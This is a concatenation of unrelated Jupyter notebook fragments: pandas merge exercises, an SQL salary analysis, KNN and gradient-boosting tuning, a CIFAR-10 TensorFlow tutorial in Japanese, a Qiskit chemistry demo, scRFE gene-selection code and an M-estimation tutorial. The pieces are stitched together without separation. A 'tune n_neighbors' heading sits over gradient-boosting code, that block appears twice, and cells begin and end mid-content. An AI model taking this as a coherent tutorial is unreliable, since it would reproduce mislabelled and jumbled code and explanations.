appending the track lists together from different Metallica albums. From there, you will merge it with the `invoice_items` table to determine which track sold the most.The tables `tracks_master`, `tracks_ride`, `tracks_st`, and `invoice_items` have loaded for you.Instructions- Use the `.append()` method to combine (**in this order**) `tracks_ride`, `tracks_master`, and `tracks_st` together vertically, and save to `metallica_tracks`.- Merge `metallica_tracks` and `invoice_items` on `tid` with an inner join, and save to `tracks_invoices`.- For each `tid` and `name` in `tracks_invoices`, sum the quantity sold column, and save as `tracks_sold`.- Sort `tracks_sold` in descending order by the `quantity` column, and print the table.# Import the DataFrames invoice_items = pd.read_csv('invoice_items.csv') # Use the .append() method to combine the tracks tables metallica_tracks = tracks_ride.append([tracks_master, tracks_st], sort=False) # Merge metallica_tracks and invoice_items tracks_invoices = metallica_tracks.merge(invoice_items, on='tid') # For each tid and name sum the quantity sold tracks_sold = tracks_invoices.groupby(['tid','name']).agg({'quantity':'sum'}) # Sort in decending order by quantity and print the results tracks_sold.sort_values(['quantity'], ascending=False)Validating a mergeYou have been given 2 tables, `artists`, and `albums`. Use the console to merge them using `artists.merge(albums, on='artid').head()`. Adjust the `validate` argument to answer which statement is **False**. You can use `'many_to_one'` without an error, since there is a duplicate key in the left table. Concatenate and merge to find common songsThe senior leadership of the streaming service is requesting your help again. You are given the historical files for a popular playlist in the classical music genre in 2018 and 2019. Additionally, you are given a similar set of files for the most popular pop music genre playlist on the streaming service in 2018 and 2019. Your goal is to concatenate the respective files to make a large classical playlist table and overall popular music table. Then filter the classical music table using a semi-join to return only the most popular classical music tracks.The tables `classic_18`, `classic_19`, and `pop_18`, `pop_19` have been loaded for you.Instructions- Concatenate the `classic_18` and `classic_19` tables vertically where the index goes from 0 to n-1, and save to `classic_18_19`.- Concatenate the `pop_18` and `pop_19` tables vertically where the index goes from 0 to n-1, and save to `pop_18_19`.# Import the DataFrames classic_18 = pd.read_csv('classic_18.csv') classic_19 = pd.read_csv('classic_19.csv') pop_18 = pd.read_csv('pop_18.csv') pop_19 = pd.read_csv('pop_19.csv') # Concatenate the classic tables vertically classic_18_19 = pd.concat([classic_18, classic_19], ignore_index=True) # Concatenate the pop tables vertically pop_18_19 = pd.concat([pop_18, pop_19], ignore_index=True) # Merge classic_18_19 with pop_18_19 classic_pop = classic_18_19.merge(pop_18_19, on='tid') # Using .isin(), filter classic_18_19 rows where tid is in classic_pop popular_classic = classic_18_19[classic_18_19['tid'].isin(classic_pop['tid'])] # Print popular chart popular_classicImport Dependenciesimport matplotlib.pyplot as plt import pandas as pd from sqlalchemy import create_engine import psycopg2 engine = create_engine(f'postgresql://{user}:{passw}@127.0.0.1/Employees_db') connection = engine.connect()Download the Dataemployees = pd.read_sql('SELECT * FROM employees', connection, parse_dates = ['birth_date', 'hire_date']) employees titles = pd.read_sql('SELECT * FROM titles', connection) titles salaries = pd.read_sql('SELECT * FROM salaries', connection) salaries departments = pd.read_sql('SELECT * FROM departments', connection) departments dept_manager = pd.read_sql('select * from dept_manager', connection) dept_managerFigure out the Average Salary by Title#Merge the tables employee_salaries = employees.merge(salaries, on='emp_no') employee_title_salaries = employee_salaries.merge(titles, left_on='emp_title_id', right_on='title_id') st = employee_title_salaries[['title', 'salary']] #Calculate the mean st.groupby('title')['salary'].mean().round()Graph the results#Create a histogram to visualize the most common salary ranges for employees. st.hist(column='salary') plt.xlabel("Salaries in Dollars ($)") plt.ylabel("Number of people with Salary") plt.title("Salary Count") #Create a bar chart of average salary by title title_salary = st.groupby("title")["salary"].mean() title_salary.plot.bar() plt.xticks(rotation = 45) plt.xlabel("Titles") plt.ylabel("Salary in ($)")KNN Nutcracker | June 11, 2020 | update June 16, 2020# import local libraries using host specific paths import socket, sys, time, datetime, os import numpy as np import pandas as pd import matplotlib.pyplot as plt # get paths for local computer hostname = socket.gethostname().split('.')[0] # set local path settings based on computer host if hostname == 'PFC': pylibrary = '/Users/connylin/Dropbox/Code/proj' elif hostname == 'Angular-Gyrus': pylibrary = '/Users/connylin/Code/proj' else: assert False, 'host computer not regonized' # import local variables if pylibrary not in sys.path: sys.path.insert(1, pylibrary) from brainstation_capstone.ml.toolbox.mlSOP import test_model from brainstation_capstone.ml.toolbox.mlSOP import ml_timer from brainstation_capstone.ml.toolbox.mlSOP import ModelEvaluation from brainstation_capstone.system import host_paths localpaths = host_paths.get(hostname) data_dir = os.path.join(localpaths['Capstone'], 'data') # report latest run print(f'last ran on: {datetime.datetime.now()} PT') # import data from brainstation_capstone.etl.loaddata import nutcracker data = nutcracker(localpaths, 'nutcracker', ['X_train','X_test','y_train','y_test'])rough tune - takes forever to run. Discard this option# rough tune from sklearn.neighbors import KNeighborsClassifier KNN_model = KNeighborsClassifier(n_neighbors=3) KNN_model.fit(X_train, y_train) print('finished fitting model') print(f'train score: {KNN_model.score(X_train, y_train)}') print(f'test score: {KNN_model.score(X_test, y_test)}') # rough tune # example of grid searching key hyperparametres for KNeighborsClassifier from sklearn.model_selection import GridSearchCV from sklearn.neighbors import KNeighborsClassifier # define models and parameters model = KNeighborsClassifier() n_neighbors = range(1, 21, 2) weights = ['uniform', 'distance'] metric = ['euclidean', 'manhattan', 'minkowski'] # define grid search grid = dict(n_neighbors=n_neighbors,weights=weights,metric=metric) cv = 5 #cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1) grid_search = GridSearchCV(estimator=model, param_grid=grid, n_jobs=-1, cv=cv, scoring='accuracy',error_score=0, verbose=5) grid_result = grid_search.fit(X_train, y_train) # summarize results means = grid_result.cv_results_['mean_test_score'] stds = grid_result.cv_results_['std_test_score'] params = grid_result.cv_results_['params'] for mean, stdev, param in zip(means, stds, params): print("%f (%f) with: %r" % (mean, stdev, param)) print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))tune n_neighborsfrom sklearn.ensemble import GradientBoostingClassifier # hyperparameters - testing learning_rate = np.arange(0.9, 1, 0.02) # max tested 0.1 can be more (There is a trade-off between learning_rate and n_estimators) hyperparameter_list = learning_rate.copy() hyperparameter_name = 'learning_rate' # hyperparameters - determined - can tune further subsample = 0.8 # can tune between 0.99 to 0.5 max_depth = 4 # 9 or more can be better, but to limit time spend on tuning others, keep this low when testing n_estimators = 100 # more better, but takes a lot more time. # hyperparameters - determined - no further tuning verbose = 1 random_state = 318 loss = 'deviance' # hyperparameters - to test min_samples_leaf = 1 min_samples_split = 2 min_weight_fraction_leaf = 0.0 min_impurity_decrease = 0.0 min_impurity_split = None init = None max_features = None max_leaf_nodes = None validation_fraction = 0.1 n_iter_no_change = None tol = 1e-4 ccp_alpha = 0.0 # hyperparameters - test - low priorty criterion = 'friedman_mse' # generally best warm_start = False # test hyperparameter model_acc = test_model() timer = ml_timer() for parameter in hyperparameter_list: print(f'running: {hyperparameter_name} = {parameter}') timer.param_start() model = GradientBoostingClassifier(verbose=verbose, random_state=random_state, warm_start=warm_start, loss=loss, max_depth=max_depth, n_estimators=n_estimators, learning_rate=parameter, subsample=subsample, max_features=max_features, criterion=criterion, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf, min_weight_fraction_leaf=min_weight_fraction_leaf, min_impurity_decrease=min_impurity_decrease, min_impurity_split=min_impurity_split, init=init, max_leaf_nodes=max_leaf_nodes, validation_fraction=validation_fraction, n_iter_no_change=n_iter_no_change, tol=tol, ccp_alpha=ccp_alpha ) model_acc.score_data(model, data) timer.param_end() print(model) # end time timer.session_end() time_per_session = timer.get_time() # graph hyperparameterplot(hyperparameter_list, model_acc.train_acc, model_acc.test_acc, hyperparameter_name) print(f'{hyperparameter_name} = {hyperparameter_list}') print(f'train_acc = {model_acc.train_acc}\ntest_acc = {model_acc.test_acc}') print(f'time per param = {time_per_session}') from sklearn.ensemble import GradientBoostingClassifier # hyperparameters - testing learning_rate = np.arange(0.9, 1, 0.02) # max tested 0.1 can be more (There is a trade-off between learning_rate and n_estimators) hyperparameter_list = learning_rate.copy() hyperparameter_name = 'learning_rate' # hyperparameters - determined - can tune further subsample = 0.8 # can tune between 0.99 to 0.5 max_depth = 4 # 9 or more can be better, but to limit time spend on tuning others, keep this low when testing n_estimators = 100 # more better, but takes a lot more time. # hyperparameters - determined - no further tuning verbose = 1 random_state = 318 loss = 'deviance' # hyperparameters - to test min_samples_leaf = 1 min_samples_split = 2 min_weight_fraction_leaf = 0.0 min_impurity_decrease = 0.0 min_impurity_split = None init = None max_features = None max_leaf_nodes = None validation_fraction = 0.1 n_iter_no_change = None tol = 1e-4 ccp_alpha = 0.0 # hyperparameters - test - low priorty criterion = 'friedman_mse' # generally best warm_start = False # test hyperparameter model_acc = test_model() timer = ml_timer() for parameter in hyperparameter_list: print(f'running: {hyperparameter_name} = {parameter}') timer.param_start() model = GradientBoostingClassifier(verbose=verbose, random_state=random_state, warm_start=warm_start, loss=loss, max_depth=max_depth, n_estimators=n_estimators, learning_rate=parameter, subsample=subsample, max_features=max_features, criterion=criterion, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf, min_weight_fraction_leaf=min_weight_fraction_leaf, min_impurity_decrease=min_impurity_decrease, min_impurity_split=min_impurity_split, init=init, max_leaf_nodes=max_leaf_nodes, validation_fraction=validation_fraction, n_iter_no_change=n_iter_no_change, tol=tol, ccp_alpha=ccp_alpha ) model_acc.score_data(model, data) timer.param_end() print(model) # end time timer.session_end() time_per_session = timer.get_time() # graph hyperparameterplot(hyperparameter_list, model_acc.train_acc, model_acc.test_acc, hyperparameter_name) print(f'{hyperparameter_name} = {hyperparameter_list}') print(f'train_acc = {model_acc.train_acc}\ntest_acc = {model_acc.test_acc}') print(f'time per param = {time_per_session}')This is the model without memory and just backproping on all the examples! time th DQN_Simulation.lua --nepochs 1000 --gamma 0.8 \ --learning_rate 1e-4 --cuts 5 --n_rand 100 \ --edim 50 --mem_size 6 --metric f1 --nnmod bow _ = plotdata('./sim_perf.txt', 'Rouge, Loss, Epsilon across training Epochs - BOW') ! time th DQN_Simulation.lua --nepochs 1000 --gamma 0 \ --learning_rate 1e-4 --cuts 5 --n_rand 100 \ --edim 50 --mem_size 6 --metric f1 --nnmod bow _ = plotdata('./sim_perf.txt', 'Rouge, Loss, Epsilon across training Epochs - BOW')**[CDS-01]** 必要なモジュールをインポートして、乱数のシードを設定します。import tensorflow as tf import numpy as np import matplotlib.pyplot as plt ### Windwos版では下記が必要 import os ### np.random.seed(20160704) tf.set_random_seed(20160704)**[CDS-02]** CIFAR-10 のデータセットをダウンロードします。ダウンロード完了まで少し時間がかかります。### Linuxでは下記から5行の行頭の「#」を外す。 #%%bash #mkdir -p /tmp/cifar10_data #cd /tmp/cifar10_data #curl -OL http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz #tar xzf cifar-10-binary.tar.gz ### Windows版 !mkdir \tmp\cifar10_data > NUL 2>&1 os.chdir("\\tmp\\cifar10_data") !curl -OL http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz !tar -xzf cifar-10-binary.tar.gz% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 162M 0 46472 0 0 46472 0 1:00:59 --:--:-- 1:00:59 64634 0 162M 0 582k 0 0 582k 0 0:04:44 0:00:01 0:04:43 362k 1 162M 1 3193k 0 0 1596k 0 0:01:44 0:00:02 0:01:42 1201k 3 162M 3 5470k 0 0 1823k 0 0:01:31 0:00:03 0:01:28 1528k 4 162M 4 8299k 0 0 2074k 0 0:01:20 0:00:04 0:01:16 1812k 6 162M 6 10.9M 0 0 2232k 0 0:01:14 0:00:05 0:01:09 2287k 8 162M 8 13.9M 0 0 2374k 0 0:01:09 0:00:06 0:01:03 2750k 10 162M 10 16.8M 0 0 2464k 0 0:01:07 0:00:07 0:01:00 2855k 12 162M 12 19.8M 0 0 2538k 0 0:01:05 0:00:08 0:00:57 2966k 14 162M 14 22.8M 0 0 2600k 0 0:01[...]**[CDS-03]** ダウンロードしたデータを確認します。ここでは、テストセット用のデータ test_batch.bin を使用します。### Linuxでは下記の行頭の「#」を外す。 #!ls -lR /tmp/cifar10_data ### Windows版 !dir /B /S \tmp\cifar10_dataC:\tmp\cifar10_data\cifar-10-batches-bin C:\tmp\cifar10_data\cifar-10-binary.tar.gz C:\tmp\cifar10_data\cifar-10-batches-bin\batches.meta.txt C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_1.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_2.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_3.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_4.bin C:\tmp\cifar10_data\cifar-10-batches-bin\data_batch_5.bin C:\tmp\cifar10_data\cifar-10-batches-bin\readme.html C:\tmp\cifar10_data\cifar-10-batches-bin\test_batch.bin**[CDS-04]** データファイルから画像イメージとラベルデータを読み取る関数を用意します。def read_cifar10(filename_queue): class CIFAR10Record(object): pass result = CIFAR10Record() label_bytes = 1 result.height = 32 result.width = 32 result.depth = 3 image_bytes = result.height * result.width * result.depth record_bytes = label_bytes + image_bytes reader = tf.FixedLengthRecordReader(record_bytes=record_bytes) result.key, value = reader.read(filename_queue) record_bytes = tf.decode_raw(value, tf.uint8) result.label = tf.cast( tf.slice(record_bytes, [0], [label_bytes]), tf.int32) depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]), [result.depth, result.height, result.width]) # Convert from [depth, height, width] to [height, width, depth]. result.uint8image = tf.transpose(depth_major, [1, 2, 0]) return result**[CDS-04]** それぞれのラベルについて、8個ずつの画像イメージを表示します。sess = tf.Session() filename = '/tmp/cifar10_data/cifar-10-batches-bin/test_batch.bin' q = tf.FIFOQueue(99, [tf.string], shapes=()) q.enqueue([filename]).run(session=sess) q.close().run(session=sess) result = read_cifar10(q) samples = [[] for l in range(10)] while(True): label, image = sess.run([result.label, result.uint8image]) label = label[0] if len(samples[label]) < 8: samples[label].append(image) if all([len(samples[l]) >= 8 for l in range(10)]): break fig = plt.figure(figsize=(8,10)) for l in range(10): for c in range(8): subplot = fig.add_subplot(10, 8, l*8+c+1) subplot.set_xticks([]) subplot.set_yticks([]) image = samples[l][c] subplot.imshow(image.astype(np.uint8)) sess.close() ### Some WARNING will be displayed as following ... #WARNING:tensorflow:From ... FixedLengthRecordReader.__init__...WARNING:tensorflow:From :12: FixedLengthRecordReader.__init__ (from tensorflow.python.ops.io_ops) is deprecated and will be removed in a future version. Instructions for updating: Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.FixedLengthRecordDataset`.**[CDS-05]** 前処理を施した画像イメージを生成する関数を用意します。def distorted_samples(image): reshaped_image = tf.cast(image, tf.float32) width, height = 24, 24 float_images = [] resized_image = tf.image.resize_image_with_crop_or_pad(reshaped_image, width, height) # float_image = tf.image.per_image_whitening(resized_image) float_image = tf.image.per_image_standardization(resized_image) float_images.append(float_image) for _ in range(6): distorted_image = tf.random_crop(reshaped_image, [height, width, 3]) distorted_image = tf.image.random_flip_left_right(distorted_image) distorted_image = tf.image.random_brightness(distorted_image, max_delta=63) distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8) # float_image = tf.image.per_image_whitening(distorted_image) float_image = tf.image.per_image_standardization(distorted_image) float_images.append(float_image) # return tf.concat(0,float_images) return tf.concat(float_images,0)**[CDS-06]** それぞれのラベルについて、オリジナル、および、前処理を施した画像イメージを表示します。sess = tf.Session() filename = '/tmp/cifar10_data/cifar-10-batches-bin/test_batch.bin' q = tf.FIFOQueue(99, [tf.string], shapes=()) q.enqueue([filename]).run(session=sess) q.close().run(session=sess) result = read_cifar10(q) fig = plt.figure(figsize=(8,10)) c = 0 original = {} modified = {} while len(original.keys()) < 10: label, orig, dists = sess.run([result.label, result.uint8image, distorted_samples(result.uint8image)]) label = label[0] if not label in original.keys(): original[label] = orig modified[label] = dists for l in range(10): orig, dists = original[l], modified[l] c += 1 subplot = fig.add_subplot(10, 8, c) subplot.set_xticks([]) subplot.set_yticks([]) subplot.imshow(orig.astype(np.uint8)) for i in range(7): c += 1 subplot = fig.add_subplot(10, 8, c) subplot.set_xticks([]) subplot.set_yticks([]) pos = i*24 image = dists[pos:pos+24]*40+120 subplot.imshow(image.astype(np.uint8)) sess.close()_*Particle hole transformation of FermionicOperator*_This notebook demonstrates carrying out a ParticleHole transformation on the FermionicOperator in Qiskit Chemistry. Here we use the FermionicOperator directly to demonstrate.Note: The Hamiltonian class that wraps this provides a means to use either full, or particle hole transformation. Under the covers it does what is shown here though.This notebook has been written to use the PYSCF chemistry driver.import numpy as np from qiskit import BasicAer from qiskit.transpiler import PassManager from qiskit.aqua import Operator, QuantumInstance from qiskit.aqua.algorithms.adaptive import VQE from qiskit.aqua.algorithms.classical import ExactEigensolver from qiskit.aqua.components.optimizers import L_BFGS_B from qiskit.aqua.components.variational_forms import RY from qiskit.chemistry import FermionicOperator from qiskit.chemistry.drivers import PySCFDriver, UnitsTypeWe'll do this with H2 molecule and use the PySCF driver to create the integrals we need for the FermionicOperator.driver = PySCFDriver(atom='H .0 .0 .0; H .0 .0 0.735', unit=UnitsType.ANGSTROM, charge=0, spin=0, basis='sto3g') molecule = driver.run()We first create the FermionicOperator and use ExactEigensolver with qubit operator we get from it via a jordan wigner mapping to compute the ground state energy. Here this is the electronic component of the total ground state energy (the total ground state energy would include the nuclear repulsion energy we can get from the molecule that comes from the driver)ferOp = FermionicOperator(h1=molecule.one_body_integrals, h2=molecule.two_body_integrals) qubitOp_jw = ferOp.mapping(map_type='JORDAN_WIGNER', threshold=0.00000001) qubitOp_jw.chop(10**-10) # Using exact eigensolver to get the smallest eigenvalue exact_eigensolver = ExactEigensolver(qubitOp_jw, k=1) ret = exact_eigensolver.run() # print(qubitOp_jw.print_operators()) print('The exact ground state energy is: {}'.format(ret['energy'])) print('The Hartree Fock Electron Energy is: {}'.format(molecule.hf_energy - molecule.nuclear_repulsion_energy))The exact ground state energy is: -1.8572750302023795 The Hartree Fock Electron Energy is: -1.8369679912029842Now the same as above but with ParticleHole transformation. This removes out energy from the FermionicOperator that is equivalent to the electronic part of the Hartree Fock Energy that we also computed above. The Hartree Fock energy also comes from the driver. To get the total electronic ground state energy we need to add the part we now compute with the part that was removed by the transformation.# particle hole transformation newferOp, energy_shift = ferOp.particle_hole_transformation(num_particles=2) print('Energy shift is: {}'.format(energy_shift)) newqubitOp_jw = newferOp.mapping(map_type='JORDAN_WIGNER', threshold=0.00000001) newqubitOp_jw.chop(10**-10) exact_eigensolver = ExactEigensolver(newqubitOp_jw, k=1) ret = exact_eigensolver.run() # print(newqubitOp_jw.print_operators()) print('The exact ground state energy in PH basis is {}'.format(ret['energy'])) print('The exact ground state energy in PH basis is {} (with energy_shift)'.format(ret['energy'] - energy_shift))Energy shift is: 1.8369679912029846 The exact ground state energy in PH basis is -0.020307038999396183 The exact ground state energy in PH basis is -1.8572750302023808 (with energy_shift)We run here using the quantum VQE algorithm to show the same result. The parameters printed are the optimal parameters of the variational form at the minimum energy, the ground state.# setup VQE # setup optimizer, use L_BFGS_B optimizer for example lbfgs = L_BFGS_B(maxfun=1000, factr=10, iprint=10) # setup variational form generator (generate trial circuits for VQE) var_form = RY(newqubitOp_jw.num_qubits, 5, entangler_map = [[0, 1], [1, 2], [2, 3]]) # setup VQE with operator, variational form, and optimizer vqe_algorithm = VQE(newqubitOp_jw, var_form, lbfgs, 'matrix') backend = BasicAer.get_backend('statevector_simulator') quantum_instance = QuantumInstance(backend, pass_manager=PassManager()) results = vqe_algorithm.run(quantum_instance) print("Minimum value: {}".format(results['eigvals'][0].real)) print("Minimum value: {}".format(results['eigvals'][0].real - energy_shift)) print("Parameters: {}".format(results['opt_params']))Minimum value: -0.020307038771711697 Minimum value: -1.8572750299746963 Parameters: [-0.62024568 -0.94461634 -0.12822854 -1.33174693 -3.12835752 -2.41119768 0.67926104 2.44344768 0.72721421 -2.76518798 -1.08251803 -1.75962366 0.54861203 1.8995056 3.04269648 -1.75046119 0.16409288 0.68204022 -0.07661803 -0.76359574 -1.56412942 -2.02324628 1.50961019 1.31452025]scRFE# MENTION ONE VS ALL CLASSIFICATION in description # Imports import numpy as np import pandas as pd import scanpy as sc import random from anndata import read_h5ad from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import train_test_split from sklearn.feature_selection import SelectFromModel from sklearn.metrics import accuracy_score from sklearn.feature_selection import RFE from sklearn.feature_selection import RFECV import seaborn as sns import matplotlib.pyplot as plt def filterNormalize (dataMatrix, classOfInterest): np.random.seed(644685) sc.logging.print_versions() sc.settings.verbosity = 3 sc.logging.print_versions() tiss = dataMatrix tiss.obs['n_counts'] = tiss.X.sum(axis=1).A1 sc.pp.filter_cells(tiss, min_genes=250) sc.pp.filter_genes(tiss, min_cells=3) tiss = tiss[tiss.obs['n_counts'] > 1500, :] sc.pp.normalize_per_cell(tiss, counts_per_cell_after=1e5) sc.pp.log1p(tiss) tiss.raw = tiss tiss = tiss[tiss.obs[classOfInterest]!='nan'] return tiss # goal: get labels on a per class basis that will go into randomForest function for y def getLabels (dataMatrix, classOfInterest): """ Gets labels on a per class basis that will inputted to the randomForest function Parameters ---------- dataMatrix : anndata object The data file of interest classOfInterest : str The class you will split the data by in the set of dataMatrix.obs Returns ------- labelsDict : dict Dictionary with labels for each class """ dataMatrix = filterNormalize (dataMatrix, classOfInterest) labelsDict = {} for label in np.unique(dataMatrix.obs[classOfInterest]): lists = [] for obs in dataMatrix.obs[classOfInterest]: if obs == label: lists.append('A') else: lists.append('B') labelsDict[label] = lists #this is usually in line w if and else return labelsDict def makeOneForest (dataMatrix, classOfInterest, labelOfInterest, nEstimators = 5000, randomState = 0, nJobs = -1, oobScore = True, Step = 0.2, Cv = 5): """ Builds and runs a random forest for one label in a class of interest Parameters ---------- dataMatrix : anndata object The data file of interest classOfInterest : str The class you will split the data by in the set of dataMatrix.obs labelOfInterest : str The specific label within the class that the random forezt will run a "one vs all" classification on nEstimators : int The number of trees in the forest randomState : int Controls random number being used nJobs : int The number of jobs to run in parallel oobScore : bool Whether to use out-of-bag samples to estimate the generalization accuracy Step : float Corresponds to percentage of features to remove at each iteration Cv : int Determines the cross-validation splitting strategy Returns ------- feature_selected : list list of top features from random forest selector.estimator_.feature_importances_ : list list of top ginis corresponding to to features """ dataMatrix = filterNormalize (dataMatrix, classOfInterest) # print('makeOneForest' + labelOfInterest) labelsDict = getLabels(dataMatrix, classOfInterest) feat_labels = dataMatrix.var_names #this is equivalent of the genes X = dataMatrix.X y = labelsDict[labelOfInterest] # print('Y') clf = RandomForestClassifier(n_estimators = nEstimators, random_state = randomState, n_jobs = nJobs, oob_score = oobScore) selector = RFECV(clf, step = Step, cv = Cv) # print('training...') clf.fit(X, y) selector.fit(X, y) feature_selected = feat_labels[selector.support_] return feature_selected, selector.estimator_.feature_importances_ def resultWrite (classOfInterest, results_df, labelOfInterest, feature_selected, feature_importance): # print ('result writing') # print(results_df) column_headings = [] column_headings.append(labelOfInterest) column_headings.append(labelOfInterest + '_gini') resaux = pd.DataFrame(columns = column_headings) resaux[labelOfInterest] = feature_selected resaux[labelOfInterest + '_gini'] = feature_importance resaux = resaux.sort_values(by = [labelOfInterest + '_gini'], ascending = False) resaux.reset_index(drop = True, inplace = True) results_df = pd.concat([results_df, resaux], axis=1) return results_df def scRFE(dataMatrix, classOfInterest, nEstimators = 5000, randomState = 0, nJobs = -1, oobScore = True, Step = 0.2, Cv = 5): """ Builds and runs a random forest with one vs all classification for each label for one class of interest Parameters ---------- dataMatrix : anndata object The data file of interest classOfInterest : str The class you will split the data by in the set of dataMatrix.obs labelOfInterest : str The specific label within the class that the random forezt will run a "one vs all" classification on nEstimators : int The number of trees in the forest randomState : int Controls random number being used nJobs : int The number of jobs to run in parallel oobScore : bool Whether to use out-of-bag samples to estimate the generalization accuracy Step : float Corresponds to percentage of features to remove at each iteration Cv : int Determines the cross-validation splitting strategy Returns ------- results_df : pd.DataFrame Dataframe with results for each label in the class, formatted as "label" for one column, then "label + gini" for the corresponding column """ dataMatrix = filterNormalize (dataMatrix, classOfInterest) results_df = pd.DataFrame() for labelOfInterest in np.unique(dataMatrix.obs[classOfInterest]): #for timeliness # print( 'scRFE' + labelOfInterest) feature_selected, feature_importance = makeOneForest(dataMatrix, classOfInterest, labelOfInterest = labelOfInterest) results_df = resultWrite (classOfInterest, results_df, labelOfInterest = labelOfInterest, feature_selected = feature_selected, feature_importance = feature_importance) # print(results_df.shape) return results_dfM-estimation of stochastic action plansGenerally, we are interested in the estimation of deterministic action plans. For example, we may want to estimate the mean of an outcome with everyone under action $a=1$. Using potential outcomes, this quantity is$$E[Y(a=1)]$$where $Y(a)$ is the potential outcome under action $a$ (and observations are assumed to be IID).A competing estimand is the outcome mean under a stochastic plan. Namely, the stochastic plan sets the *probability* of an action for each individual. We denote this investigator-specified probability by $\Pr^*(A=1 | W)$, where $A$ is the action and $W$ is baseline covariates. The stochastic mean can be denoted as$$E[Y(a=1) \Pr^*(A=1 | W)]$$Notice the deterministic plan is a special case of a stochastic plan, where $\Pr^*(A=1 | W) = 1$ (and reduces to the previous). A variety of $\Pr^*(A=1 | W)$ functions can be specified. One general example is to set the probability to a constant, $\Pr^*(A=1 | W) = \alpha$. For example, $\alpha = 0.5$ would correspond to the mean had everyone given given a 50% chance of $a=1$. This type of investigator-specified function could further be made to change based on the baseline covariates $W$. Perhaps a more realistic alternative (or rather a investigator function more amenable to actual implementation) are shifts in an individual's probability of an action. If $\Pr(A=1 | W)$ denotes the population conditional probability of an action, then we can consider the policy$$\Pr^*(A=1 | W) = \text{logit}(\Pr(A=1 | W) + \delta)$$where $\delta$ indicates a shift in the log-odds of the action. Therefore, this plan can be viewed as an intervention which increases (or decreases for $\delta < 0$) the uptake of action $a=1$. Hereafter, our tutorial focuses on this latter parameter. To estimate the mean under our stochastic plan, we use the following inverse probability weighting estimator$$\mu_{IPW} = \sum_{i=1}^n Y_i \frac{\Pr^*(A_i=1|W_i)}{\Pr(A_i=1 | W_i)}$$ OverviewHere, we demonstrate how M-estimation can be used to estimate the mean under stochastic action plans. Specifically, we demonstrate plans where the probability of $A=1$ is shifted, which involves estimation of the conditional probability of $A=1$. We discuss a the pitfall: estimation of the probability to be shifted is treated as known. We show how M-estimation (and the sandwich variance) can easily accomodate this feature.# Initial setup import numpy as np import scipy as sp import pandas as pd import matplotlib.pyplot as plt %matplotlib inline import delicatessen from delicatessen import MEstimator from delicatessen.estimating_equations import ee_logistic_regression from delicatessen.estimating_equations import ee_ridge_linear_regression from delicatessen.utilities import inverse_logit np.random.seed(51520837) print("NumPy version: ", np.__version__) print("SciPy version: ", sp.__version__) print("Pandas version: ", pd.__version__) print("Delicatessen version:", delicatessen.__version__)NumPy version: 1.19.5 SciPy version: 1.5.4 Pandas version: 1.1.5 Delicatessen version: 0.2Motivating ProblemTo motivate our discussion, we will consider data generated according to the following diagram.from zepid.causal.causalgraph import DirectedAcyclicGraph from zepid.graphics import pvalue_plot dag = DirectedAcyclicGraph(exposure="A", outcome="Y") dag.add_arrows(pairs=(("A", "Y"), ("W", "Y"), ("W", "A"))) pos = {"A": [0, 0], "Y": [1, 0], "W": [-1, 0.01]} dag.draw_dag(positions=pos)The following generates 1000 observations that adhere to the causal diagramn = 1000 # Generating lots of observations to reduce randomness # Generating baseline covariates d = pd.DataFrame() d['W'] = np.random.normal(size=n) # Generating actions pr_a = sp.stats.logistic.cdf(0. + 0.9*d['W']) d['A'] = np.random.binomial(n=1, p=pr_a, size=n) # Generating potential outcomes d['Ya1'] = (25 + 2 - 2.5*d['W'] + 1.6*1*d['W'] + np.random.normal(size=n)) d['Ya0'] = (25 + 0 - 2.5*d['W'] + 1.6*0*d['W'] + np.random.normal(size=n)) # Generating outcomes via causal consistency d['Y'] = np.where(d['A'] == 1, d['Ya1'], d['Ya0']) # Data we get to see d = d[["W", "A", "Y"]].copy() d['C'] = 1 d.describe()EstimationHere, we estimate the probability of $A$. Those probabilities are then shifted according to our policy (plus 1.5 to the log-odds of $A$). The shifted probability is treated an being estimated in this M-estimator (since the coefficients for the model are all being estimated inside the `psi` function).# Extracting covariates for use in psi() W = np.asarray(d[['C', 'W']]) A = np.asarray(d['A']) y = np.asarray(d['Y']) delta = 1.5 def psi(theta): beta = theta[1:] # Estimating Pr(A=1|W=w) for weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(logit_pi_aw + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating mean at stochastic policy ya_delta = y*ipw - theta[0] # Returning estimating equations return np.vstack((ya_delta[None, :], a_model)) # Estimating equation starting_vals = [0, 0, 0] estr1 = MEstimator(psi, init=starting_vals) estr1.estimate(solver='lm') mean = estr1.theta[0] var = estr1.variance[0, 0] ci = estr1.confidence_intervals()[0, :] print("======================================") print("Accounting for Confounding") print("======================================") print("ACE: ", np.round(mean, 3)) print("95% CI:", np.round(ci, 3)) print("======================================")====================================== Accounting for Confounding ====================================== ACE: 26.765 95% CI: [26.642 26.888] ======================================This second M-estimator treats the probabilities being shifted as *known*. This can be seen by the coefficients used to construct `pi_a_delta` being estimated outside of the `psi` function (the coefficients are pulled from the previous model). Therefore, this M-estimator (incorrectly) assumes that the stochastic plan is *known*.# Extracting covariates for use in psi() W = np.asarray(d[['C', 'W']]) A = np.asarray(d['A']) y = np.asarray(d['Y']) # previous coefficients coefs = estr1.theta[1:] delta = 1.5 def psi(theta): beta = theta[1:] # Estimating Pr(A=1|W=w) and weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of 